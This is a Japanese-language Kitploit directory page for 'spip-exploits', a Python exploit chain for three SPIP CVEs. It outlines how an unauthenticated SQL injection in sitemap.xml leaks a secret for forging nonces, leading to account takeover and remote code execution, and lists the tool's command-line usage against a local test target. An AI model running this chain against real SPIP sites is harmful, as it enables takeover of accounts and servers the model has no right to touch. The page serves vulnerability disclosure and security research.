Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
spip-exploits — SPIPのCVE 2026-72708/72709/72710に対するPythonエクスプロイトチェーン。認証不要のSQLインジェクションをアカウント乗っ取りおよびリモートコード実行へと連鎖させる。 | Kitploit
ツール/GitHubGitHub/ambionics/spip-exploits
エクスプロイトフレームワーク脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト論文と研究
GitHubambionics/spip-exploits

spip-exploits

SPIPのCVE 2026-72708/72709/72710に対するPythonエクスプロイトチェーン。認証不要のSQLインジェクションをアカウント乗っ取りおよびリモートコード実行へと連鎖させる。

リポジトリを見る
11日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Casse-Spip (CVE-2026-72708, CVE-2026-72709, CVE-2026-72710)

未認証のSQLインジェクションからリモートコード実行へ

Franck Chevalier (Wayko) によって発見された CVE-2026-72708、CVE-2026-72709、CVE-2026-72710 のエクスプロイト

完全な技術的詳細については、Lexfoのブログの全文記事をお読みください。

免責事項

このリポジトリは、研究および防御的セキュリティの目的でのみ提供されています。 著者は、この情報の悪用に対して一切の責任を負いません。


概要

エントリーポイントは、公開されている sitemap.xml ページにおけるSQLインジェクションで、alea_ephemere を漏洩させます。

このシークレットがあれば、匿名アクション用の有効なnonceを偽造できます。

そこからRCEに至る2つのアクションがあります:

  • action=editer_auteur によるアカウント乗っ取り、その後プライベートエリアからのRCE。
  • action=editer_objet によるマスアサインメントで、spip_jobs キューに行を書き込み、action=cron を通じて実行します。

  • エクスプロイト

    セットアップ

    root@kitploit:~
    python3 -m venv .venv
    .venv/bin/pip install -r requirements.txt
    .venv/bin/python3 casse-spip.py --help
    

    検出

    root@kitploit:~
    .venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000
    

    フルチェーン 1 : アカウント乗っ取り (CVE-2026-72708 > CVE-2026-72709)

    root@kitploit:~
    .venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"
    

    上書きする前に、--ato はターゲットの login と現在の pass ハッシュを(SQLi経由で)ダンプするので、後で --restore-hash を使って元に戻すことができます:

    root@kitploit:~
    .venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1
    

    フルチェーン 2 : RCE (CVE-2026-72708 > CVE-2026-72709 > CVE-2026-72710)

    root@kitploit:~
    .venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"
    

    ファイルは IMG/casse-spip_<token>.html に書き込まれます。


    参考文献

    • ブログ記事 - 技術的詳細
    • Vulncheck - 脆弱性の詳細
    • CVE-2026-72708
    • CVE-2026-72709
    • CVE-2026-72710
    ツールをダウンロード